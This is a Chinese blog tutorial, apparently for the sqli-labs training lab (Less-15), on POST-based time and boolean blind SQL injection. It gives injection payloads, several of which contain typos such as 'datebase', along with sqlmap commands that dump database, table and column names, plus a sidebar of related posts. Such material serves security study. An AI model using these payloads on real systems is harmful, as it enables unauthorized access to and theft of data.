POST基于时间和布尔盲注

最新推荐文章于 2024-05-26 10:49:06 发布
最新推荐文章于 2024-05-26 10:49:06 发布
阅读量271 收藏 1
点赞数 1
文章标签: web3.py
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60876907/article/details/131815521
版权
文章介绍了POST请求在HTTP中的作用,特别是如何利用POST数据进行SQL注入攻击,包括时间盲注和布尔盲注两种方式。通过示例展示了如何检测和利用盲注漏洞,提到了自动化工具Sqlmap在探测、爆破数据库和表内容等方面的应用。
摘要由CSDN通过智能技术生成

 

1,HTTP POST 介绍

POST发送数据包给服务器处理,数据包含在HTTP正文中

POST请求会向指定资源提交数据,可能会创建新的资源或者更改现有资源

2,POST基于时间盲注

存在注入点POST提交的参数 + and if (length(datebase())>5,sleep(5),null).

如果执行的时间页面响应时间大于5 秒,肯定存在注入点,并且对应的SQL 语句执行

以Less-15 为例

1,进行抓包

2,闭合单引号进行注入

命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit

页面响应时间大于5秒(注意括号的用法)

 

e8a4b8936989443e8ebcf6e905b520e1.png

 

3,POST基于布尔盲注

1,在存在注入点POST提交的参数后加入 if 判断正确或者错误的语句

select length(datebase());

select length(datebase(),1,1);

select length(datebase(),1,1)>N;

2,进行布尔盲注

SQL语句:uname=admin' and (length(datebase())=8) --&passwd=admin&submit=Submit

通过对<>=之后的数字进行探测,进而得出数据的长度

当输出位 flag 时,得到数据的长度

dd16ca8702a34ebca39f1dcd6e81936e.png

 

可用于探测表名,字段名等等

4,Sqlmap安全测试

需要指定探测技术 --technique T(time) B(boolean)

1,获取对应的HTTP头

2,使用sqlmap进行渗透

python sqlmap.py -r 1.txt --technique T -p uname

通过回显得出存在时间注入

f5adb22ad0314125b49b461aaf3da22a.png

 

3,爆破数据库

python sqlmap.py -r 1.txt --technique T -p uname --dbs

得出数据库名称

45ff1db2fe2c4b0789f9d6217b7f3cc9.png

 

4,爆破数据表

python sqlmap.py -r 1.txt --technique T -p uname -D security --tables

ab44ec0864b4433e924f5b159791debe.png

 

 

5,爆破数据库内容以及字段

python sqlmap.py -r1.txt --technique T -p uname -D security -T users --columns

d2904096a45d44e398679e5a869d2dd2.png

 

 

手工盲注的时间复杂度很大,通常使用盲注脚本

林时樾
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 867
开启第十五关,先尝试注入注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
第九节 POST基于时间布尔盲注-01
09-15
盲注可以分为基于时间盲注和基于布尔盲注两种。下面我们将详细介绍这两种盲注技术。 一、HTTP POST 介绍 在 HTTP 协议中,POST 方法是一种常见的请求方法。POST 方法允许客户端向服务器提交数据,以便服务器...
POST基于时间布尔盲注
qq_43776408的博客
06-10 1011
HTTP POST介绍 也就是说POST提交的数据是在HTTP请求中 其实二者并没有区别 上图的倒数第二行是目的地址 最后一行是你要传递的参数的值 POST基于时间盲注 这个之前做过 我们使用Less-15为例 原sql语句为 select * from admin where username=‘name’ and password=‘pw’ limit 0,1 所以你在写的时候需要name‘ 语句 – 后面那个–用于注释掉原sql语句的username后的name后的单引号 然后点击go,你会发
高级Web安全测试:POST方式盲注技术详解与实战案例
最新发布
weixin_43822401的博客
05-26 402
盲注技术要求攻击者在没有直接反馈的情况下,通过应用程序的行为变化来推断数据库的内部信息。这种技术通常用于那些对错误信息进行了严格处理的应用程序,使得普通的注入手段无法获取有用信息。
时间盲注布尔盲注脚本
星星的博客
07-01 408
sql盲注
sqli-labs通关-------15lesson-post(基于单引号的布尔时间盲注)
枯藤闲画云
07-05 329
尝试反斜杠,发现没有任何报错。 此刻可以考了一下时间盲注了。 uname=1 or sleep(5) #&passwd=&submit=Submit 发现无效 对username 尝试闭合,发现是单引号闭合。So 开始时间盲注测试吧。我就先告辞了 ...
SQL-labs练习记录(16~20)【post时间盲注,密码注入,UA注入,referer注入,cookie注入
bin789456的博客
08-22 459
post时间盲注,附带新脚本,从包入手,更改各项数据。
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式...以上就是关于布尔盲注Python脚本的相关知识点,了解这些可以帮助我们更好地识别和防范此类攻击,同时也能在安全测试中运用这些工具和技术。
sql注入攻击的原理和防范攻击的方法.docx
09-07
攻击者获取信息的可能采取的方式包括基于布尔盲注、基于时间盲注、基于报错的注入等。 SQL 注入攻击防范的方法: 1. 定制黑白名单:将常用请求定制为白名单,一些攻击频繁的攻击限制其为黑名单,可以通过...
sqli-labs靶场练习笔记
11-09
- **核心技能**:熟练掌握SQL注入的基本原理与技术手段,包括联合查询、布尔盲注时间盲注等。 - **实战经验**:通过解决具体的关卡问题,积累实战经验,提高解决问题的能力。 - **安全意识**:了解SQL注入的危害性...
SQL注入防御.ppt
10-27
基于布尔盲注检测是指攻击者使用布尔逻辑来推断数据库中的数据。攻击者可以通过在用户输入中注入恶意 SQL 代码,来推断数据库中的数据。 ### 2. 基于时间盲注检测 基于时间盲注检测是指攻击者使用时间延迟来...
SQL | POST基于时间布尔盲注
m_de_g的博客
12-06 1485
SQL | POST基于时间布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间盲注 3.POST基于布尔盲注 4.sqlmap安全测试 ...
(手工)【sqli-labs15-16】POST注入布尔/时间盲注
07-07 999
【SQL-POST布尔/时间盲注
Sqli-labs6-10 盲注、基于时间,基于报错(附脚本)
Recar的博客
12-13 2671
第六题 双引号双注入和第五题一样的界面单引号,不报错,使用双引号 报错http://localhost/sqli-labs/Less-6/?id=-1"; union select 1 from(select count(*),concat_ws(':',(select version()),floor(rand(0)*2))a from information_schema.tables gro
SQL 盲注GET /POST布尔型,延时型Python脚本
小锤队长的博客
08-09 4324
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
两种CTF中特殊盲注的总结
蚁景网安学院
02-04 940
知识点实操概要MySQL注入中,3种盲注方式:基于布尔盲注、基于时间盲注、基于报错的盲注。以此掌握盲注原理!链接指路:https://www.hetianlab.com/expc.do...
尝试时间盲注get和post
m0re's blog
03-12 536
时间盲注概念(百度经验): MySQL基于时间盲注的原理分析,注入SQL语句执行后不提示真假,也不能通过页面内容来进行判断,通过构造SQL语句注入,查看页面响应的时间来判断信息为时间盲注。 基础函数 if(payload,true,false)如果payload是正确的,那就执行true,否则就执行false。 sleep()这个函数有一个参数,可以延迟输出,可以根据它是否延迟相应的时间来判断语句...
15、延时布尔盲注(Post)
weixin_41489908的博客
12-04 484
环境sqli-labs less 15 1、首先我们抓包 2、测试注入 在 username 输入 1’ or 1=1# 在 password 输入 任意 所以用单引号闭合 3、我们构造语句 uname=admin’ and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Sub...
sqlmap使用布尔盲注的命令
04-18
SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员发现和利用Web应用程序中的SQL注入漏洞。在使用SQLMap进行布尔盲注时,可以使用以下命令: 1. 基本命令: ``` python sqlmap.py -u <目标URL> --data "<POST数据>" --cookie "<Cookie数据>" --level <注入等级> --risk <注入风险等级> ``` 其中,`<目标URL>`是要测试的目标网址,`<POST数据>`是POST请求的数据,`<Cookie数据>`是请求中的Cookie信息,`<注入等级>`和`<注入风险等级>`是指定注入的等级和风险等级。 2. 布尔盲注命令: ``` python sqlmap.py -u <目标URL> --data "<POST数据>" --cookie "<Cookie数据>" --level <注入等级> --risk <注入风险等级> --technique B ``` 在基本命令的基础上,通过添加`--technique B`参数来指定使用布尔盲注的技术。 以上是使用SQLMap进行布尔盲注的基本命令,你可以根据实际情况进行参数的调整和配置。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值